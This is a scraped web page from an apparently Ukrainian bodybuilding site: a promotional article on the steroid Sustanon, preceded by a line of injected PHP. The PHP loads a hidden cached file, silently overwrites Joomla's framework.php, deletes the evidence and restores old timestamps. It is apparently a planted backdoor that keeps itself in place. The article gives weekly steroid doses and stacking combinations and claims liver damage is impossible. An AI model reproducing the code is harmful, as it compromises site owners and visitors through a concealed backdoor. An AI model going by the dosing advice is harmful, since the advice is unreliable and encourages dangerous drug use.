$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Сустанон | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Сустанон

СустанонСустанон - дуже популярний стероїд, який високо ціниться тими, хто користується ним, тому що в порівнянні з іншими препаратами тестостерону має кілька переваг. Сустанон - це суміш чотирьох тестостеронів, які внаслідок певної структури володіють сінергістичним ефектом. На підставі особливої взаємодії діючих хімічних речовин сустанон міліграм за міліграмом дає кращий вплив, ніж тестостерон енантат, ціпіонат і пропіонат. Крім того, дія цих хімічних речовин виявляється і в часовому відношенні один за одним, так що сустанон починає діяти швидко і в той же час залишається ефективно діючим в організмі протягом декількох тижнів, завдяки вмісту в сустаноні пропіонату. Сустанон справляє свій вплив на організм вже через день і продовжує бути активним у ньому 3-4 тижні завдяки доданому до складу деканоату. Сустанон має виражений андрогенний вплив, що сполучається в ньому з сильним анаболічним впливом. Тому він добре придатний для нарощування сили і м'язової маси. Відбувається сильний приріст сили з одночасним збільшенням маси тіла. Атлети, які використовують сустанон, розповідають про солідний приріст мускулатури, тому що він накопичує значно менше води і не так сильно ароматизується, як тестостерон енантат і тестостеронціпіонат. Багато спортсменів бодібілдирів, що мають проблеми з іншими тестостеронами зі значним скупченням води і високим рівнем естрогенів, надають перевагу сустанону.

Кидається в очі, що сустанон добре впливає навіть на просунутих атлетів у відносно невеликих дозах. Цікаво, що сустанон дає такі ж гарні результати у спортсменів, які вже не раз застосовували сустанон. Сустанон вколюють всього раз на тиждень, при цьому перерва між ін'єкціями може доходити до 10 днів. Дозування в бодібілдінгу простягається від 250 мг -1000 мг на тиждень. Для більшості достатньо дози в 500 мг на тиждень, яка часто скорочується до всього лише 250 мг сустанону на тиждень і комбінується з яким-небудь оральним стероїдом. У лікуванні сустанон дуже добре придатний як базисний стероїд, який сприяє регенираціі, дає атлетові достатній поштовх для інтенсивних тренувань і, разом з цим, - швидким припливом сили і солідним приростом м'язової маси і доброю переносимістю. Для швидкого нарощування м'язової маси сустанон часто комбінується з Дека-дураболін, Метандіеноном або Анаполоном, в той час як атлети, що надають більше уваги якості, комбінують його швидше з Параболоном, Вінстролом, оксандролоном або ще з Прімоболаном.

Хоча сустанон в розумних дозах не сильно ароматизується, багато хто все ж додатково приймає анти-естрогени, щоб таким чином за допомогою Нольвадекса та/або Провірона, приміром, звести нанівець обумовлені естрогенами побічні явища. Оскільки Сустанон пригнічує власне вироблення тестостерону, в кінці лікування або приблизно через 6 тижнів з початку його прийому слід взяти до уваги прийом гонадотропінів і/або Кломід.

Жінкам не слід приймати тестостерони тривалої дії, тому що інакше сильно підвищується рівень андрогенів в крові і внаслідок цього можуть виникнути явища вірилізації. Ми хотіли б ще раз підкреслити, що новачки в стероїдних курсах повинні триматися подалі від всіх тестостеронів, тому що вони в даний період роботи над собою просто зовсім не потрібні.

Побічні явища сустанону схожі з побічними явищами тестостерон енантата, лише за тим винятком, що вони виявляються менш часто і не так сильно виражені. У залежності від часу прийому і доз використовуємого сустанону може виникнути звичайні андрогенно обумовлені побічні явища: такі, як акне, агресивність, сексуальна суперстимуляція, жирна шкіра, прискорене випадання волосся, знижене вироблення статевих гормонів. Скупчення води і гінекомастія може триматися при сустанономі в межах норми, або виявляється не так часто, як при енантат і Ціпіонате. Пошкодження печінки при сустанон неможливо, та все ж при дуже високих дозах може відбутися підвищення показників печінки, які в міру припинення прийому препарату знову нормалізуються.
 
Статті СТЕРОЇДИ Сустанон